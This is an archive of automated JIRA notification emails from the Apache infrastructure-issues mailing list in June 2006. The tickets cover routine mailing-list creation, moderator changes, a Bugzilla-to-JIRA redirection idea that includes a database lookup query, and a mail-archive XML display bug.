ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38147 invoked by uid 99); 23 Jun 2006 00:42:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 17:42:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 17:42:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B172A410007 for <[email protected]>; Fri, 23 Jun 2006 00:41:30 +0000 (GMT) Message-ID: <14557707.1151023290723.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 00:41:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (INFRA-738) Create initial subscriber list for OFBiz lists, using input from OFBiz project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-738?page=all ] Brett Porter reassigned INFRA-738: ---------------------------------- Assign To: Brett Porter > Create initial subscriber list for OFBiz lists, using input from OFBiz project > ------------------------------------------------------------------------------ > > Key: INFRA-738 > URL: http://issues.apache.org/jira/browse/INFRA-738 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: David N. Welton > Assignee: Brett Porter > > Hi, > The OFBiz guys will need to move their subscribers over to the newly created lists (thanks for taking care of that!). This will need to be coordinated with them so that a time window is found when they can generate the list of subscribers, send it, and then have the new lists 'go live'. Also, I imagine the subscriber list can just be a .txt file with a list of email addresses - is that correct? > Thanks, > Dave -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 00:43:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97426 invoked from network); 23 Jun 2006 00:43:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 00:43:13 -0000 Received: (qmail 39085 invoked by uid 500); 23 Jun 2006 00:43:05 -0000 Delivered-To: [email protected] Received: (qmail 38567 invoked by uid 500); 23 Jun 2006 00:43:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38530 invoked by uid 99); 23 Jun 2006 00:43:00 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 17:43:00 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 17:42:59 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 0469641000B for <[email protected]>; Fri, 23 Jun 2006 00:41:33 +0000 (GMT) Message-ID: <30558731.1151023293015.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 00:41:33 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-797) Create new mailing lists for HiveMind In-Reply-To: <32141093.1147277045847.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-797?page=comments#action_12417396 ] Brett Porter commented on INFRA-797: ------------------------------------ what is the related issue to link to for this? Still waiting for DNS... > Create new mailing lists for HiveMind > ------------------------------------- > > Key: INFRA-797 > URL: http://issues.apache.org/jira/browse/INFRA-797 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists, Mail Archives > Reporter: James Carman > > Now that HiveMind is a TLP, it needs new mailing lists and corresponding archives. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 01:49:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11051 invoked from network); 23 Jun 2006 01:49:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 01:49:02 -0000 Received: (qmail 74114 invoked by uid 500); 23 Jun 2006 01:48:58 -0000 Delivered-To: [email protected] Received: (qmail 73792 invoked by uid 500); 23 Jun 2006 01:48:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73778 invoked by uid 99); 23 Jun 2006 01:48:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:48:57 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:48:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 349AD410005 for <[email protected]>; Fri, 23 Jun 2006 01:47:30 +0000 (GMT) Message-ID: <3893015.1151027250185.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 01:47:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-793) Add reply-to header to Tomcat digest lists In-Reply-To: <10519502.1147043960890.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-793?page=comments#action_12417399 ] Brett Porter commented on INFRA-793: ------------------------------------ I've added this file for the dev list and have subscribed to both to see if it makes a difference. I'm having trouble finding info on this or testing it by hand. > Add reply-to header to Tomcat digest lists > ------------------------------------------ > > Key: INFRA-793 > URL: http://issues.apache.org/jira/browse/INFRA-793 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Mark Thomas > Priority: Minor > > Please enable the full message headers (including reply-to) for the following Tomcat mailing lists: > [email protected] > [email protected] > Thanks, > Mark -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 01:49:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12058 invoked from network); 23 Jun 2006 01:49:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 01:49:11 -0000 Received: (qmail 74518 invoked by uid 500); 23 Jun 2006 01:49:03 -0000 Delivered-To: [email protected] Received: (qmail 74237 invoked by uid 500); 23 Jun 2006 01:49:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74157 invoked by uid 99); 23 Jun 2006 01:48:59 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:48:59 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:48:58 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8DC7E410009 for <[email protected]>; Fri, 23 Jun 2006 01:47:31 +0000 (GMT) Message-ID: <20280581.1151027251576.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 01:47:31 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (INFRA-793) Add reply-to header to Tomcat digest lists In-Reply-To: <10519502.1147043960890.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-793?page=all ] Brett Porter reassigned INFRA-793: ---------------------------------- Assign To: Brett Porter > Add reply-to header to Tomcat digest lists > ------------------------------------------ > > Key: INFRA-793 > URL: http://issues.apache.org/jira/browse/INFRA-793 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Mark Thomas > Assignee: Brett Porter > Priority: Minor > > Please enable the full message headers (including reply-to) for the following Tomcat mailing lists: > [email protected] > [email protected] > Thanks, > Mark -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 01:53:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12819 invoked from network); 23 Jun 2006 01:53:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 01:53:00 -0000 Received: (qmail 76270 invoked by uid 500); 23 Jun 2006 01:52:58 -0000 Delivered-To: [email protected] Received: (qmail 76008 invoked by uid 500); 23 Jun 2006 01:52:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75996 invoked by uid 99); 23 Jun 2006 01:52:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:52:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:52:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B6143410007 for <[email protected]>; Fri, 23 Jun 2006 01:51:30 +0000 (GMT) Message-ID: <4630542.1151027490743.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 01:51:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-738) Create initial subscriber list for OFBiz lists, using input from OFBiz project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-738?page=all ] Brett Porter closed INFRA-738: ------------------------------ Resolution: Fixed > Create initial subscriber list for OFBiz lists, using input from OFBiz project > ------------------------------------------------------------------------------ > > Key: INFRA-738 > URL: http://issues.apache.org/jira/browse/INFRA-738 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: David N. Welton > Assignee: Brett Porter > > Hi, > The OFBiz guys will need to move their subscribers over to the newly created lists (thanks for taking care of that!). This will need to be coordinated with them so that a time window is found when they can generate the list of subscribers, send it, and then have the new lists 'go live'. Also, I imagine the subscriber list can just be a .txt file with a list of email addresses - is that correct? > Thanks, > Dave -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 02:00:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14537 invoked from network); 23 Jun 2006 02:00:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 02:00:01 -0000 Received: (qmail 79875 invoked by uid 500); 23 Jun 2006 01:59:58 -0000 Delivered-To: [email protected] Received: (qmail 79652 invoked by uid 500); 23 Jun 2006 01:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79641 invoked by uid 99); 23 Jun 2006 01:59:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:59:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:59:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B229E410007 for <[email protected]>; Fri, 23 Jun 2006 01:58:30 +0000 (GMT) Message-ID: <29348770.1151027910726.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 01:58:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-858) Private list for adffaces project In-Reply-To: <13565727.1151009729770.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-858?page=3Dall ] =20 Brett Porter closed INFRA-858: ------------------------------ Resolution: Won't Fix already exists. Craig is subscribed twice (gmal & apache), and is the moder= ator. Manfred is the only other subscriber. I'll leave it up to Craig and yourself to get people subscribed. > Private list for adffaces project > --------------------------------- > > Key: INFRA-858 > URL: http://issues.apache.org/jira/browse/INFRA-858 > Project: Infrastructure > Type: Task > Security: public(Regular issues)=20 > Reporter: Matthias We=C3=9Fendorf > Assignee: Brett Porter > > The adffaces incubation project does not have a private/ppmc list for dis= cussion of things like new committers. Please can we create a list for that= with the archive visible to adffaces committers (adffaces group). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > Please add matzew and/or craigmcc as a moderator for the new list with th= e ability to add other subscribers. Is it possible to pre-subscribe all adf= faces committers or should they send in subscription requests? --=20 This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 02:00:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15229 invoked from network); 23 Jun 2006 02:00:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 02:00:08 -0000 Received: (qmail 80385 invoked by uid 500); 23 Jun 2006 02:00:04 -0000 Delivered-To: [email protected] Received: (qmail 80096 invoked by uid 500); 23 Jun 2006 02:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80004 invoked by uid 99); 23 Jun 2006 01:59:59 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:59:59 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 18:59:59 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 344A5410009 for <[email protected]>; Fri, 23 Jun 2006 01:58:32 +0000 (GMT) Message-ID: <20459557.1151027912211.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 01:58:32 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-850) Update moderators for JMeter mailing lists In-Reply-To: <3850987.1150637489997.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-850?page=all ] Brett Porter closed INFRA-850: ------------------------------ Resolution: Fixed Assign To: Brett Porter > Update moderators for JMeter mailing lists > ------------------------------------------ > > Key: INFRA-850 > URL: http://issues.apache.org/jira/browse/INFRA-850 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Sebb > Assignee: Brett Porter > > Please can you update the moderators for the JMeter mailing lists as follows: > jmeter-dev: > - remove [email protected] (the address is no longer valid) > + add woolfel AT AO (Peter Lin) as moderator > jmeter-user: > + add woolfel AT AO (Peter Lin) as moderator > Thanks! -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 02:05:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17495 invoked from network); 23 Jun 2006 02:05:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 02:05:00 -0000 Received: (qmail 83756 invoked by uid 500); 23 Jun 2006 02:04:59 -0000 Delivered-To: [email protected] Received: (qmail 83447 invoked by uid 500); 23 Jun 2006 02:04:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83432 invoked by uid 99); 23 Jun 2006 02:04:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 19:04:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 19:04:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A6A3A410007 for <[email protected]>; Fri, 23 Jun 2006 02:03:30 +0000 (GMT) Message-ID: <23380510.1151028210678.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 02:03:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-839) Private list for Tuscany project In-Reply-To: <12820429.1149796289765.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-839?page=all ] Brett Porter closed INFRA-839: ------------------------------ Resolution: Fixed done ([email protected]). Jerermy is the sole subscriber/moderator and can take care of adding other subs. > Private list for Tuscany project > -------------------------------- > > Key: INFRA-839 > URL: http://issues.apache.org/jira/browse/INFRA-839 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Jeremy Boynes > Assignee: Brett Porter > > The Tuscany project does not have a private/ppmc list for discussion of things like new committers. Please can we create a list for that with the archive visible to tuscany committers (ws-tuscany group I believe). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > or > [email protected] > as appropriate. > Please add jboynes as a moderator for the new list with the ability to add other subscribers. Is it possible to pre-subscribe all Tuscany committers or should they send in subscription requests? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 05:47:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61658 invoked from network); 23 Jun 2006 05:47:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 05:47:03 -0000 Received: (qmail 50854 invoked by uid 500); 23 Jun 2006 05:46:58 -0000 Delivered-To: [email protected] Received: (qmail 50550 invoked by uid 500); 23 Jun 2006 05:46:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50532 invoked by uid 99); 23 Jun 2006 05:46:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 22:46:57 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 22:46:56 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C40FF410005 for <[email protected]>; Fri, 23 Jun 2006 05:45:29 +0000 (GMT) Message-ID: <21430247.1151041529773.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 05:45:29 +0000 (GMT+00:00) From: "Jeff Turner (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-859) Notify Bugzilla users when a project has moved to JIRA MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Notify Bugzilla users when a project has moved to JIRA ------------------------------------------------------ Key: INFRA-859 URL: http://issues.apache.org/jira/browse/INFRA-859 Project: Infrastructure Type: Improvement Security: public (Regular issues) Components: JIRA, Bugzilla Reporter: Jeff Turner Various projects have moved from Bugzilla to JIRA. Although we can disable creation of new Bugzilla bugs, we cannot prevent people from commenting. We need a way of redirecting users to the equivalent JIRA issue. Testing if a Bugzilla bug is superceded by a JIRA issue is fairly easy. Just query the JIRA database with the bug ID. Eg. to test bug 798: jira@brutus:~$ mysql jira -e "select pkey from jiraissue, customfield, customfieldvalue where jiraissue.id=customfieldvalue.issue and customfield.id=customfieldvalue.customfield and customfield.cfname='Bugzilla Id' and customfieldvalue.NUMBERVALUE=798" +-----------+ | pkey | +-----------+ | XALANJ-40 | +-----------+ If the query returns nothing, the Bugzilla bug is not superceded. So now we just need someone with enough Perl/Bugzilla-fu to integrate this test into show_bug.cgi :) Any takers? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 19:02:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10854 invoked from network); 23 Jun 2006 19:02:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 19:02:04 -0000 Received: (qmail 86560 invoked by uid 500); 23 Jun 2006 19:02:00 -0000 Delivered-To: [email protected] Received: (qmail 86315 invoked by uid 500); 23 Jun 2006 19:01:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86285 invoked by uid 99); 23 Jun 2006 19:01:59 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 12:01:59 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 12:01:58 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 93C4F410007 for <[email protected]>; Fri, 23 Jun 2006 19:00:30 +0000 (GMT) Message-ID: <162243.1151089230575.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 19:00:30 +0000 (GMT+00:00) From: "Martin Sebor (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-860) XML errors in archived posts MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N XML errors in archived posts ---------------------------- Key: INFRA-860 URL: http://issues.apache.org/jira/browse/INFRA-860 Project: Infrastructure Type: Bug Security: public (Regular issues) Components: Mail Archives Environment: Mozilla 1.7.12/Linux Reporter: Martin Sebor Priority: Critical The following message fails to open in the archive browser due to an XML error: http://mail-archives.apache.org/[email protected]%3e The message was sent in response to this post: http://[email protected]%3e -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 19:08:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12314 invoked from network); 23 Jun 2006 19:08:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 19:08:01 -0000 Received: (qmail 91604 invoked by uid 500); 23 Jun 2006 19:07:59 -0000 Delivered-To: [email protected] Received: (qmail 91379 invoked by uid 500); 23 Jun 2006 19:07:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91364 invoked by uid 99); 23 Jun 2006 19:07:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 12:07:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 12:07:58 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2E707410007 for <[email protected]>; Fri, 23 Jun 2006 19:06:30 +0000 (GMT) Message-ID: <18784589.1151089590171.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 19:06:30 +0000 (GMT+00:00) From: "Martin Sebor (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-860) XML errors in archived posts In-Reply-To: <162243.1151089230575.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-860?page=all ] Martin Sebor updated INFRA-860: ------------------------------- Attachment: [email protected] The error page is attached. > XML errors in archived posts > ---------------------------- > > Key: INFRA-860 > URL: http://issues.apache.org/jira/browse/INFRA-860 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: Mail Archives > Environment: Mozilla 1.7.12/Linux > Reporter: Martin Sebor > Priority: Critical > Attachments: [email protected] > > The following message fails to open in the archive browser due to an XML error: > http://mail-archives.apache.org/[email protected]%3e > The message was sent in response to this post: > http://[email protected]%3e -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: 